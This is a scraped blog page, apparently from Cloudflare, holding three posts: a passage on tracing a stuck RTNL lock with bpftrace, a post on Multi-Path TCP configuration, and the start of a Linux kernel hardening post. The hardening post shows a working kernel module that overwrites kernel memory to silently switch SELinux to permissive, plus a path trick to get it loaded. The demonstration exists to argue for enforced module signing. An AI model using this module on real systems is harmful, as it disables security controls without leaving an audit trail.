This one was tricky to debug. Usually, the alerts are limited by one or two different processes, meaning only a certain application or subsystem experiences an issue. In this case, we saw dozens of unrelated tasks hanging for minutes with no improvements over time. Nothing else was in the log, most of the system metrics were fine, and existing traffic was being served, but it was not possible to ssh to the server. New Kubernetes container creations were also stalling. Analyzing the stack traces of different tasks initially revealed that all the traces were limited to just three functions:
\n
rtnetlink_rcv_msg+0x9/0x3c0\ndev_ethtool+0xc6/0x2db0 \nbonding_show_bonds+0x20/0xb0
\n
Further investigation showed that all of these functions were waiting for rtnl_lock
to be acquired. It looked like some application acquired the rtnl_mutex
and didn’t release it. All other processes were in the D
state waiting for this lock.
The RTNL lock is primarily used by the kernel networking subsystem for any network-related config, for both writing and reading. The RTNL is a global mutex lock, although upstream efforts are being made for splitting up RTNL per network namespace (netns).
From the hung task reports, we can observe the “victims” that are being stalled waiting for the lock, but how do we identify the task that is holding this lock for too long? For troubleshooting this, we leveraged BPF
via a bpftrace
script, as this allows us to inspect the running kernel state. The kernel’s mutex implementation has a struct member called owner
. It contains a pointer to the task_struct
from the mutex-owning process, except it is encoded as type atomic_long_t
. This is because the mutex implementation stores some state information in the lower 3-bits (mask 0x7) of this pointer. Thus, to read and dereference this task_struct
pointer, we must first mask off the lower bits (0x7).
Our bpftrace
script to determine who holds the mutex is as follows:
\n
#!/usr/bin/env bpftrace\ninterval:s:10 {\n $rtnl_mutex = (struct mutex *) kaddr("rtnl_mutex");\n $owner = (struct task_struct *) ($rtnl_mutex->owner.counter & ~0x07);\n if ($owner != 0) {\n printf("rtnl_mutex->owner = %u %s\\n", $owner->pid, $owner->comm);\n }\n}
\n
In this script, the rtnl_mutex
lock is a global lock whose address can be exposed via /proc/kallsyms
– using bpftrace
helper function kaddr()
, we can access the struct mutex pointer from the kallsyms
. Thus, we can periodically (via interval:s:10
) check if someone is holding this lock.
In the output we had this:
\n
rtnl_mutex->owner = 3895365 calico-node
\n
This allowed us to quickly identify calico-node
as the process holding the RTNL lock for too long. To quickly observe where this process itself is stalled, the call stack is available via /proc/3895365/stack
. This showed us that the root cause was a Wireguard config change, with function wg_set_device()
holding the RTNL lock, and peer_remove_after_dead()
waiting too long for a napi_disable()
call. We continued debugging via a tool called drgn
, which is a programmable debugger that can debug a running kernel via a Python-like interactive shell. We still haven’t discovered the root cause for the Wireguard issue and have asked the upstream for help, but that is another story.
Summary: The hung task messages were the only ones which we had in the kernel log. Each stack trace of these messages was unique, but by carefully analyzing them, we could spot similarities and continue debugging with other instruments.
\n \n
Your system might have different hung task warnings, and we have many others not mentioned here. Each case is unique, and there is no standard approach to debug them. But hopefully this blog post helps you better understand why it’s good to have these warnings enabled, how they work, and what the meaning is behind them. We tried to provide some navigation guidance for the debugging process as well:
-
analyzing the stack trace might be a good starting point for debugging it, even if all the messages look unrelated, like we saw in example #3
-
keep in mind that the alert might be misleading, pointing to the victim and not the offender, as we saw in example #2 and example #3
-
if the kernel doesn’t schedule your application on the CPU, puts it in the D state, and emits the warning – the real problem might exist in the application code
Good luck with your debugging, and hopefully this material will help you on this journey!
“],”published_at”:[0,”2025-02-14T14:00+00:00″],”updated_at”:[0,”2025-03-03T07:09:45.578Z”],”feature_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4iHBIzAkLrDyr0Gc4NAtK3/6c26fa93870ea112c62a791a30bcf705/image1.png”],”tags”:[1,[[0,{“id”:[0,”2UVIYusJwlvsmPYl2AvSuR”],”name”:[0,”Deep Dive”],”slug”:[0,”deep-dive”]}],[0,{“id”:[0,”383iv0UQ6Lp0GZwOAxGq2p”],”name”:[0,”Linux”],”slug”:[0,”linux”]}],[0,{“id”:[0,”73alK6sbtKLS6uB7ZrYrjj”],”name”:[0,”Kernel”],”slug”:[0,”kernel”]}],[0,{“id”:[0,”3VJOfQ8TnNJwqu1GIGwPuA”],”name”:[0,”Monitoring”],”slug”:[0,”monitoring”]}]]],”relatedTags”:[0],”authors”:[1,[[0,{“name”:[0,”Oxana Kharitonova”],”slug”:[0,”oxana”],”bio”:[0,null],”profile_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3VMs5mLnM2JGDuB1x0sRSE/957ab30efef528d9fa8ccf73f1c20242/oxana.png”],”location”:[0,”London”],”website”:[0,null],”twitter”:[0,null],”facebook”:[0,null]}],[0,{“name”:[0,”Jesper Brouer”],”slug”:[0,”jesper-brouer”],”bio”:[0],”profile_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/QAY4H7YQSvJvLIPB5Ff0p/6f6aa104cc897511714dddc9ea4ebe1a/Jesper_Brouer.jpg”],”location”:[0],”website”:[0],”twitter”:[0],”facebook”:[0]}]]],”meta_description”:[0,”The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the warning works.”],”primary_author”:[0,{}],”localeList”:[0,{“name”:[0,”LOC: Searching for the cause of hung tasks in the Linux kernel”],”enUS”:[0,”English for Locale”],”zhCN”:[0,”Translated for Locale”],”zhHansCN”:[0,”No Page for Locale”],”zhTW”:[0,”Translated for Locale”],”frFR”:[0,”No Page for Locale”],”deDE”:[0,”No Page for Locale”],”itIT”:[0,”No Page for Locale”],”jaJP”:[0,”No Page for Locale”],”koKR”:[0,”No Page for Locale”],”ptBR”:[0,”No Page for Locale”],”esLA”:[0,”No Page for Locale”],”esES”:[0,”No Page for Locale”],”enAU”:[0,”No Page for Locale”],”enCA”:[0,”No Page for Locale”],”enIN”:[0,”No Page for Locale”],”enGB”:[0,”No Page for Locale”],”idID”:[0,”No Page for Locale”],”ruRU”:[0,”No Page for Locale”],”svSE”:[0,”No Page for Locale”],”viVN”:[0,”No Page for Locale”],”plPL”:[0,”No Page for Locale”],”arAR”:[0,”No Page for Locale”],”nlNL”:[0,”No Page for Locale”],”thTH”:[0,”No Page for Locale”],”trTR”:[0,”No Page for Locale”],”heIL”:[0,”No Page for Locale”],”lvLV”:[0,”No Page for Locale”],”etEE”:[0,”No Page for Locale”],”ltLT”:[0,”No Page for Locale”]}],”url”:[0,”https://blog.cloudflare.com/searching-for-the-cause-of-hung-tasks-in-the-linux-kernel”],”metadata”:[0,{“title”:[0,”Searching for the cause of hung tasks in the Linux kernel”],”description”:[0,”The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the warning works.”],”imgPreview”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2dasu8nuHwyI37n0WhScLi/4f710b8e0eeee6ba46efa49c4fb6ae49/Searching_for_the_cause_of_hung_tasks_in_the_Linux_kernel-OG.png”]}]}],[0,{“id”:[0,”6ZxrGIedGqREgTs02vpt0t”],”title”:[0,”Multi-Path TCP: revolutionizing connectivity, one path at a time”],”slug”:[0,”multi-path-tcp-revolutionizing-connectivity-one-path-at-a-time”],”excerpt”:[0,”Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages,”],”featured”:[0,false],”html”:[0,”
The Internet is designed to provide multiple paths between two endpoints. Attempts to exploit multi-path opportunities are almost as old as the Internet, culminating in RFCs documenting some of the challenges. Still, today, virtually all end-to-end communication uses only one available path at a time. Why? It turns out that in multi-path setups, even the smallest differences between paths can harm the connection quality due to packet reordering and other issues. As a result, Internet devices usually use a single path and let the routers handle the path selection.
There is another way. Enter Multi-Path TCP (MPTCP), which exploits the presence of multiple interfaces on a device, such as a mobile phone that has both Wi-Fi and cellular antennas, to achieve multi-path connectivity.
MPTCP has had a long history — see the Wikipedia article and the spec (RFC 8684) for details. It’s a major extension to the TCP protocol, and historically most of the TCP changes failed to gain traction. However, MPTCP is supposed to be mostly an operating system feature, making it easy to enable. Applications should only need minor code changes to support it.
There is a caveat, however: MPTCP is still fairly immature, and while it can use multiple paths, giving it superpowers over regular TCP, it’s not always strictly better than it. Whether MPTCP should be used over TCP is really a case-by-case basis.
In this blog post we show how to set up MPTCP to find out.
\n \n \n
Internally, MPTCP extends TCP by introducing “subflows”. When everything is working, a single TCP connection can be backed by multiple MPTCP subflows, each using different paths. This is a big deal – a single TCP byte stream is now no longer identified by a single 5-tuple. On Linux you can see the subflows with ss -M
, like:
\n
marek$ ss -tMn dport = :443 | cat\ntcp ESTAB 0 \t0 192.168.2.143%enx2800af081bee:57756 104.28.152.1:443\ntcp ESTAB 0 \t0 192.168.1.149%wlp0s20f3:44719 104.28.152.1:443\nmptcp ESTAB 0 \t0 192.168.2.143:57756 104.28.152.1:443
\n
Here you can see a single MPTCP connection, composed of two underlying TCP flows.
\n
MPTCP aspirations
\n \n \n \n
\n
Being able to separate the lifetime of a connection from the lifetime of a flow allows MPTCP to address two problems present in classical TCP: aggregation and mobility.
-
Aggregation: MPTCP can aggregate the bandwidth of many network interfaces. For example, in a data center scenario, it’s common to use interface bonding. A single flow can make use of just one physical interface. MPTCP, by being able to launch many subflows, can expose greater overall bandwidth. I’m personally not convinced if this is a real problem. As we’ll learn below, modern Linux has a BLESS-like MPTCP scheduler and macOS stack has the “aggregation” mode, so aggregation should work, but I’m not sure how practical it is. However, there are certainly projects that are trying to do link aggregation using MPTCP.
-
Mobility: On a customer device, a TCP stream is typically broken if the underlying network interface goes away. This is not an uncommon occurrence — consider a smartphone dropping from Wi-Fi to cellular. MPTCP can fix this — it can create and destroy many subflows over the lifetime of a single connection and survive multiple network changes.
Improving reliability for mobile clients is a big deal. While some software can use QUIC, which also works on Multipath Extensions, a large number of classical services still use TCP. A great example is SSH: it would be very nice if you could walk around with a laptop and keep an SSH session open and switch Wi-Fi networks seamlessly, without breaking the connection.
MPTCP work was initially driven by UCLouvain in Belgium. The first serious adoption was on the iPhone. Apparently, users have a tendency to use Siri while they are walking out of their home. It’s very common to lose Wi-Fi connectivity while they are doing this. (source)
\n
Implementations
\n \n \n \n
\n
Currently, there are only two major MPTCP implementations — Linux kernel support from v5.6, but realistically you need at least kernel v6.1 (MPTCP is not supported on Android yet) and iOS from version 7 / Mac OS X from 10.10.
Typically, Linux is used on the server side, and iOS/macOS as the client. It’s possible to get Linux to work as a client-side, but it’s not straightforward, as we’ll learn soon. Beware — there is plenty of outdated Linux MPTCP documentation. The code has had a bumpy history and at least two different APIs were proposed. See the Linux kernel source for the mainline API and the mptcp.dev website.
\n
Linux as a server
\n \n \n \n
\n
Conceptually, the MPTCP design is pretty sensible. After the initial TCP handshake, each peer may announce additional addresses (and ports) on which it can be reached. There are two ways of doing this. First, in the handshake TCP packet each peer specifies the “Do not attempt to establish new subflows to this address and port” bit, also known as bit [C], in the MPTCP TCP extensions header.
\n
Wireshark dissecting MPTCP flags from a SYN packet. Tcpdump does not report this flag yet.
With this bit cleared, the other peer is free to assume the two-tuple is fine to be reconnected to. Typically, the server allows the client to reuse the server IP/port address. Usually, the client is not listening and disallows the server to connect back to it. There are caveats though. For example, in the context of Cloudflare, where our servers are using Anycast addressing, reconnecting to the server IP/port won’t work. Going twice to the IP/port pair is unlikely to reach the same server. For us it makes sense to set this flag, disallowing clients from reconnecting to our server addresses. This can be done on Linux with:
\n
# Linux server sysctl - useful for ECMP or Anycast servers\n$ sysctl -w net.mptcp.allow_join_initial_addr_port=0\n
\n
There is also a second way to advertise a listening IP/port. During the lifetime of a connection, a peer can send an ADD-ADDR MPTCP signal which advertises a listening IP/port. This can be managed on Linux by ip mptcp endpoint ... signal
, like:
\n
# Linux server - extra listening address\n$ ip mptcp endpoint add 192.51.100.1 dev eth0 port 4321 signal\n
\n
With such a config, a Linux peer (typically server) will report the additional IP/port with ADD-ADDR MPTCP signal in an ACK packet, like this:
\n
host > host: Flags [.], ack 1, win 8, options [mptcp 30 add-addr v1 id 1 192.51.100.1:4321 hmac 0x...,nop,nop], length 0\n
\n
It’s important to realize that either peer can send ADD-ADDR messages. Unusual as it might sound, it’s totally fine for the client to advertise extra listening addresses. The most common scenario though, consists of either nobody, or just a server, sending ADD-ADDR.
Technically, to launch an MPTCP socket on Linux, you just need to replace IPPROTO_TCP with IPPROTO_MPTCP in the application code:
\n
IPPROTO_MPTCP = 262\nsd = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP)\n
\n
In practice, though, this introduces some changes to the sockets API. Currently not all setsockopt’s work yet — like TCP_USER_TIMEOUT
. Additionally, at this stage, MPTCP is incompatible with kTLS.
\n
Path manager / scheduler
\n \n \n \n
\n
Once the peers have exchanged the address information, MPTCP is ready to kick in and perform the magic. There are two independent pieces of logic that MPTCP handles. First, given the address information, MPTCP must figure out if it should establish additional subflows. The component that decides on this is called “Path Manager”. Then, another component called “scheduler” is responsible for choosing a specific subflow to transmit the data over.
Both peers have a path manager, but typically only the client uses it. A path manager has a hard task to launch enough subflows to get the benefits, but not too many subflows which could waste resources. This is where the MPTCP stacks get complicated.
\n
Linux as client
\n \n \n \n
\n
On Linux, path manager is an operating system feature, not an application feature. The in-kernel path manager requires some configuration — it must know which IP addresses and interfaces are okay to start new subflows. This is configured with ip mptcp endpoint ... subflow
, like:
\n
$ ip mptcp endpoint add dev wlp1s0 192.0.2.3 subflow # Linux client\n
\n
This informs the path manager that we (typically a client) own a 192.0.2.3 IP address on interface wlp1s0, and that it’s fine to use it as source of a new subflow. There are two additional flags that can be passed here: “backup” and “fullmesh”. Maintaining these ip mptcp endpoints
on a client is annoying. They need to be added and removed every time networks change. Fortunately, NetworkManager from 1.40 supports managing these by default. If you want to customize the “backup” or “fullmesh” flags, you can do this here (see the documentation):
\n
ubuntu$ cat /etc/NetworkManager/conf.d/95-mptcp.conf\n# set "subflow" on all managed "ip mptcp endpoints". 0x22 is the default.\n[connection]\nconnection.mptcp-flags=0x22\n
\n
Path manager also takes a “limit” setting, to set a cap of additional subflows per MPTCP connection, and limit the received ADD-ADDR messages, like:
\n
$ ip mptcp limits set subflow 4 add_addr_accepted 2 # Linux client\n
\n
I experimented with the “mobility” use case on my Ubuntu 22 Linux laptop. I repeatedly enabled and disabled Wi-Fi and Ethernet. On new kernels (v6.12), it works, and I was able to hold a reliable MPTCP connection over many interface changes. I was less lucky with the Ubuntu v6.8 kernel. Unfortunately, the default path manager on Linux client only works when the flag “Do not attempt to establish new subflows to this address and port” is cleared on the server. Server-announced ADD-ADDR don’t result in new subflows created, unless ip mptcp endpoint
has a fullmesh
flag.
It feels like the underlying MPTCP transport code works, but the path manager requires a bit more intelligence. With a new kernel, it’s possible to get the “interactive” case working out of the box, but not for the ADD-ADDR case.
\n
Custom path manager
\n \n \n \n
\n
Linux allows for two implementations of a path manager component. It can either use built-in kernel implementation (default), or userspace netlink daemon.
\n
$ sysctl -w net.mptcp.pm_type=1 # use userspace path manager\n
\n
However, from what I found there is no serious implementation of configurable userspace path manager. The existing implementations don’t do much, and the API seems immature yet.
\n
Scheduler and BPF extensions
\n \n \n \n
\n
Thus far we’ve covered Path Manager, but what about the scheduler that chooses which link to actually use? It seems that on Linux there is only one built-in “default” scheduler, and it can do basic failover on packet loss. The developers want to write MPTCP schedulers in BPF, and this work is in-progress.
\n \n
As opposed to Linux, macOS and iOS expose a raw MPTCP API. On those operating systems, path manager is not handled by the kernel, but instead can be an application responsibility. The exposed low-level API is based on connectx()
. For example, here’s an example of obscure code that establishes one connection with two subflows:
\n
int sock = socket(AF_MULTIPATH, SOCK_STREAM, 0);\nconnectx(sock, ..., &cid1);\nconnectx(sock, ..., &cid2);\n
\n
This powerful API is hard to use though, as it would require every application to listen for network changes. Fortunately, macOS and iOS also expose higher-level APIs. One example is nw_connection in C, which uses nw_parameters_set_multipath_service.
Another, more common example is using Network.framework
, and would look like this:
\n
let parameters = NWParameters.tcp\nparameters.multipathServiceType = .interactive\nlet connection = NWConnection(host: host, port: port, using: parameters) \n
\n
The API supports three MPTCP service type modes:
-
Handover Mode: Tries to minimize cellular. Uses only Wi-Fi. Uses cellular only when Wi-Fi Assist is enabled and makes such a decision.
-
Interactive Mode: Used for Siri. Reduces latency. Only for low-bandwidth flows.
-
Aggregation Mode: Enables resource pooling but it’s only available for developer accounts and not deployable.
\n
The MPTCP API is nicely integrated with the iPhone “Wi-Fi Assist” feature. While the official documentation is lacking, it’s possible to find sources explaining how it actually works. I was able to successfully test both the cleared “Do not attempt to establish new subflows” bit and ADD-ADDR scenarios. Hurray!
\n
IPv6 caveat
\n \n \n \n
\n
Sadly, MPTCP IPv6 has a caveat. Since IPv6 addresses are long, and MPTCP uses the space-constrained TCP Extensions field, there is not enough room for ADD-ADDR messages if TCP timestamps are enabled. If you want to use MPTCP and IPv6, it’s something to consider.
\n \n
I find MPTCP very exciting, being one of a few deployable serious TCP extensions. However, current implementations are limited. My experimentation showed that the only practical scenario where currently MPTCP might be useful is:
-
Linux as a server
-
macOS/iOS as a client
-
“interactive” use case
With a bit of effort, Linux can be made to work as a client.
Don’t get me wrong, Linux developers did tremendous work to get where we are, but, in my opinion for any serious out-of-the-box use case, we’re not there yet. I’m optimistic that Linux can develop a good MPTCP client story relatively soon, and the possibility of implementing the Path manager and Scheduler in BPF is really enticing.
Time will tell if MPTCP succeeds — it’s been 15 years in the making. In the meantime, Multi-Path QUIC is under active development, but it’s even further from being usable at this stage.
We’re not quite sure if it makes sense for Cloudflare to support MPTCP. Reach out if you have a use case in mind!
Shoutout to Matthieu Baerts for tremendous help with this blog post.
“],”published_at”:[0,”2025-01-03T14:00+00:00″],”updated_at”:[0,”2025-01-03T14:00:02.285Z”],”feature_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1iRiEC7LY2Bm2W9o0BW9MJ/ddc3053f79278c5268c7f2f3f7db9da6/BLOG-2637_1.png”],”tags”:[1,[[0,{“id”:[0,”5NpgoTJYJjhgjSLaY7Gt3p”],”name”:[0,”TCP”],”slug”:[0,”tcp”]}],[0,{“id”:[0,”1U6ifhBwTuaJ2w4pjNOzNT”],”name”:[0,”Network”],”slug”:[0,”network”]}],[0,{“id”:[0,”383iv0UQ6Lp0GZwOAxGq2p”],”name”:[0,”Linux”],”slug”:[0,”linux”]}],[0,{“id”:[0,”2UVIYusJwlvsmPYl2AvSuR”],”name”:[0,”Deep Dive”],”slug”:[0,”deep-dive”]}]]],”relatedTags”:[0],”authors”:[1,[[0,{“name”:[0,”Marek Majkowski”],”slug”:[0,”marek-majkowski”],”bio”:[0,null],”profile_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1JuU5qavgwVeqR8BAUrd6U/3a0d0445d41c9a3c42011046efe9c37b/marek-majkowski.jpeg”],”location”:[0,null],”website”:[0,null],”twitter”:[0,”@majek04″],”facebook”:[0,null]}]]],”meta_description”:[0,”Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages,”],”primary_author”:[0,{}],”localeList”:[0,{“name”:[0,”blog-english-only”],”enUS”:[0,”English for Locale”],”zhCN”:[0,”No Page for Locale”],”zhHansCN”:[0,”No Page for Locale”],”zhTW”:[0,”No Page for Locale”],”frFR”:[0,”No Page for Locale”],”deDE”:[0,”No Page for Locale”],”itIT”:[0,”No Page for Locale”],”jaJP”:[0,”No Page for Locale”],”koKR”:[0,”No Page for Locale”],”ptBR”:[0,”No Page for Locale”],”esLA”:[0,”No Page for Locale”],”esES”:[0,”No Page for Locale”],”enAU”:[0,”No Page for Locale”],”enCA”:[0,”No Page for Locale”],”enIN”:[0,”No Page for Locale”],”enGB”:[0,”No Page for Locale”],”idID”:[0,”No Page for Locale”],”ruRU”:[0,”No Page for Locale”],”svSE”:[0,”No Page for Locale”],”viVN”:[0,”No Page for Locale”],”plPL”:[0,”No Page for Locale”],”arAR”:[0,”No Page for Locale”],”nlNL”:[0,”No Page for Locale”],”thTH”:[0,”No Page for Locale”],”trTR”:[0,”No Page for Locale”],”heIL”:[0,”No Page for Locale”],”lvLV”:[0,”No Page for Locale”],”etEE”:[0,”No Page for Locale”],”ltLT”:[0,”No Page for Locale”]}],”url”:[0,”https://blog.cloudflare.com/multi-path-tcp-revolutionizing-connectivity-one-path-at-a-time”],”metadata”:[0,{“title”:[0,”Multi-Path TCP: Revolutionizing connectivity, one path at a time”],”description”:[0,”Multi-Path TCP (MPTCP) leverages multiple network interfaces, like Wi-Fi and cellular, to provide seamless mobility for more reliable connectivity. While promising, MPTCP is still in its early stages, with limited support and practical use cases. This post explores its potential and current limitations.\n”],”imgPreview”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2YR6jQUMONkr0AAxCB0k1q/110a9298a8bc1e34fe5ca6abb7d4588f/Multi-Path_TCP-_revolutionizing_connectivity__one_path_at_a_time-OG.png”]}]}],[0,{“id”:[0,”3ySkqS53T1nhzX61XzJFEG”],”title”:[0,”Linux kernel security tunables everyone should consider adopting”],”slug”:[0,”linux-kernel-hardening”],”excerpt”:[0,”This post illustrates some of the Linux Kernel features, which are helping us to keep our production systems more secure. We will deep dive into how they work and why you may consider enabling them as well”],”featured”:[0,false],”html”:[0,”\n
The Linux kernel is the heart of many modern production systems. It decides when any code is allowed to run and which programs/users can access which resources. It manages memory, mediates access to hardware, and does a bulk of work under the hood on behalf of programs running on top. Since the kernel is always involved in any code execution, it is in the best position to protect the system from malicious programs, enforce the desired system security policy, and provide security features for safer production environments.
In this post, we will review some Linux kernel security configurations we use at Cloudflare and how they help to block or minimize a potential system compromise.
\n
Secure boot
\n \n \n \n
\n
When a machine (either a laptop or a server) boots, it goes through several boot stages:
\n
Within a secure boot architecture each stage from the above diagram verifies the integrity of the next stage before passing execution to it, thus forming a so-called secure boot chain. This way “trustworthiness” is extended to every component in the boot chain, because if we verified the code integrity of a particular stage, we can trust this code to verify the integrity of the next stage.
We have previously covered how Cloudflare implements secure boot in the initial stages of the boot process. In this post, we will focus on the Linux kernel.
Secure boot is the cornerstone of any operating system security mechanism. The Linux kernel is the primary enforcer of the operating system security configuration and policy, so we have to be sure that the Linux kernel itself has not been tampered with. In our previous post about secure boot we showed how we use UEFI Secure Boot to ensure the integrity of the Linux kernel.
But what happens next? After the kernel gets executed, it may try to load additional drivers, or as they are called in the Linux world, kernel modules. And kernel module loading is not confined just to the boot process. A module can be loaded at any time during runtime — a new device being plugged in and a driver is needed, some additional extensions in the networking stack are required (for example, for fine-grained firewall rules), or just manually by the system administrator.
However, uncontrolled kernel module loading might pose a significant risk to system integrity. Unlike regular programs, which get executed as user space processes, kernel modules are pieces of code which get injected and executed directly in the Linux kernel address space. There is no separation between the code and data in different kernel modules and core kernel subsystems, so everything can access everything. This means that a rogue kernel module can completely nullify the trustworthiness of the operating system and make secure boot useless. As an example, consider a simple Debian 12 (Bookworm installation), but with SELinux configured and enforced:
\n
ignat@dev:~$ lsb_release --all\nNo LSB modules are available.\nDistributor ID:\tDebian\nDescription:\tDebian GNU/Linux 12 (bookworm)\nRelease:\t12\nCodename:\tbookworm\nignat@dev:~$ uname -a\nLinux dev 6.1.0-18-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64 GNU/Linux\nignat@dev:~$ sudo getenforce\nEnforcing
\n
Now we need to do some research. First, we see that we’re running 6.1.76 Linux Kernel. If we explore the source code, we would see that inside the kernel, the SELinux configuration is stored in a singleton structure, which is defined as follows:
\n
struct selinux_state {\n#ifdef CONFIG_SECURITY_SELINUX_DISABLE\n\tbool disabled;\n#endif\n#ifdef CONFIG_SECURITY_SELINUX_DEVELOP\n\tbool enforcing;\n#endif\n\tbool checkreqprot;\n\tbool initialized;\n\tbool policycap[__POLICYDB_CAP_MAX];\n\n\tstruct page *status_page;\n\tstruct mutex status_lock;\n\n\tstruct selinux_avc *avc;\n\tstruct selinux_policy __rcu *policy;\n\tstruct mutex policy_mutex;\n} __randomize_layout;
\n
From the above, we can see that if the kernel configuration has CONFIG_SECURITY_SELINUX_DEVELOP
enabled, the structure would have a boolean variable enforcing
, which controls the enforcement status of SELinux at runtime. This is exactly what the above $ sudo getenforce
command returns. We can double check that the Debian kernel indeed has the configuration option enabled:
\n
ignat@dev:~$ grep CONFIG_SECURITY_SELINUX_DEVELOP /boot/config-`uname -r`\nCONFIG_SECURITY_SELINUX_DEVELOP=y
\n
Good! Now that we have a variable in the kernel, which is responsible for some security enforcement, we can try to attack it. One problem though is the __randomize_layout
attribute: since CONFIG_SECURITY_SELINUX_DISABLE
is actually not set for our Debian kernel, normally enforcing
would be the first member of the struct. Thus if we know where the struct is, we immediately know the position of the enforcing
flag. With __randomize_layout
, during kernel compilation the compiler might place members at arbitrary positions within the struct, so it is harder to create generic exploits. But arbitrary struct randomization within the kernel may introduce performance impact, so is often disabled and it is disabled for the Debian kernel:
\n
ignat@dev:~$ grep RANDSTRUCT /boot/config-`uname -r`\nCONFIG_RANDSTRUCT_NONE=y
\n
We can also confirm the compiled position of the enforcing
flag using the pahole tool and either kernel debug symbols, if available, or (on modern kernels, if enabled) in-kernel BTF information. We will use the latter:
\n
ignat@dev:~$ pahole -C selinux_state /sys/kernel/btf/vmlinux\nstruct selinux_state {\n\tbool enforcing; /* 0 1 */\n\tbool checkreqprot; /* 1 1 */\n\tbool initialized; /* 2 1 */\n\tbool policycap[8]; /* 3 8 */\n\n\t/* XXX 5 bytes hole, try to pack */\n\n\tstruct page * status_page; /* 16 8 */\n\tstruct mutex status_lock; /* 24 32 */\n\tstruct selinux_avc * avc; /* 56 8 */\n\t/* --- cacheline 1 boundary (64 bytes) --- */\n\tstruct selinux_policy * policy; /* 64 8 */\n\tstruct mutex policy_mutex; /* 72 32 */\n\n\t/* size: 104, cachelines: 2, members: 9 */\n\t/* sum members: 99, holes: 1, sum holes: 5 */\n\t/* last cacheline: 40 bytes */\n};
\n
So enforcing
is indeed located at the start of the structure and we don’t even have to be a privileged user to confirm this.
Great! All we need is the runtime address of the selinux_state
variable inside the kernel:(shell/bash)
\n
ignat@dev:~$ sudo grep selinux_state /proc/kallsyms\nffffffffbc3bcae0 B selinux_state
\n
With all the information, we can write an almost textbook simple kernel module to manipulate the SELinux state:
Mymod.c:
\n
#include <linux/module.h>\n\nstatic int __init mod_init(void)\n{\n\tbool *selinux_enforce = (bool *)0xffffffffbc3bcae0;\n\t*selinux_enforce = false;\n\treturn 0;\n}\n\nstatic void mod_fini(void)\n{\n}\n\nmodule_init(mod_init);\nmodule_exit(mod_fini);\n\nMODULE_DESCRIPTION("A somewhat malicious module");\nMODULE_AUTHOR("Ignat Korchagin <ignat@cloudflare.com>");\nMODULE_LICENSE("GPL");
\n
And the respective Kbuild
file:
\n
obj-m := mymod.o
\n
With these two files we can build a full fledged kernel module according to the official kernel docs:
\n
ignat@dev:~$ cd mymod/\nignat@dev:~/mymod$ ls\nKbuild mymod.c\nignat@dev:~/mymod$ make -C /lib/modules/`uname -r`/build M=$PWD\nmake: Entering directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'\n CC [M] /home/ignat/mymod/mymod.o\n MODPOST /home/ignat/mymod/Module.symvers\n CC [M] /home/ignat/mymod/mymod.mod.o\n LD [M] /home/ignat/mymod/mymod.ko\n BTF [M] /home/ignat/mymod/mymod.ko\nSkipping BTF generation for /home/ignat/mymod/mymod.ko due to unavailability of vmlinux\nmake: Leaving directory '/usr/src/linux-headers-6.1.0-18-cloud-amd64'
\n
If we try to load this module now, the system may not allow it due to the SELinux policy:
\n
ignat@dev:~/mymod$ sudo insmod mymod.ko\ninsmod: ERROR: could not load module mymod.ko: Permission denied
\n
We can workaround it by copying the module into the standard module path somewhere:
\n
ignat@dev:~/mymod$ sudo cp mymod.ko /lib/modules/`uname -r`/kernel/crypto/
\n
Now let’s try it out:
\n
ignat@dev:~/mymod$ sudo getenforce\nEnforcing\nignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko\nignat@dev:~/mymod$ sudo getenforce\nPermissive
\n
Not only did we disable the SELinux protection via a malicious kernel module, we did it quietly. Normal sudo setenforce 0
, even if allowed, would go through the official selinuxfs interface and would emit an audit message. Our code manipulated the kernel memory directly, so no one was alerted. This illustrates why uncontrolled kernel module loading is very dangerous and that is why most security standards and commercial security monitoring products advocate for close monitoring of kernel module loading.
But we don’t need to monitor kernel modules at Cloudflare. Let’s repeat the exercise on a Cloudflare production kernel (module recompilation skipped for brevity):
\n
ignat@dev:~/mymod$ uname -a\nLinux dev 6.6.17-cloudflare-2024.2.9 #1 SMP PREEMPT_DYNAMIC Mon Sep 27 00:00:00 UTC 2010 x86_64 GNU/Linux\nignat@dev:~/mymod$ sudo insmod /lib/modules/`uname -r`/kernel/crypto/mymod.ko\ninsmod: ERROR: could not insert module /lib/modules/6.6.17-cloudflare-2024.2.9/kernel/crypto/mymod.ko: Key was rejected by service
\n
We get a Key was rejected by service
error when trying to load a module, and the kernel log will have the following message:
\n
ignat@dev:~/mymod$ sudo dmesg | tail -n 1\n[41515.037031] Loading of unsigned module is rejected
\n
This is because the Cloudflare kernel requires all the kernel modules to have a valid signature, so we don’t even have to worry about a malicious module being loaded at some point:
\n
ignat@dev:~$ grep MODULE_SIG_FORCE /boot/config-`uname -r`\nCONFIG_MODULE_SIG_FORCE=y
\n
For completeness it is worth noting that the Debian stock kernel also supports module signatures, but does not enforce it:
\n
ignat@dev:~$ grep MODULE_SIG /boot/config-6.1.0-18-cloud-amd64\nCONFIG_MODULE_SIG_FORMAT=y\nCONFIG_MODULE_SIG=y\n# CONFIG_MODULE_SIG_FORCE is not set\n…
\n
The above configuration means that the kernel will validate a module signature, if available. But if not – the module will be loaded anyway with a warning message emitted and the kernel will be tainted.
\n
Key management for kernel module signing
\n \n \n \n
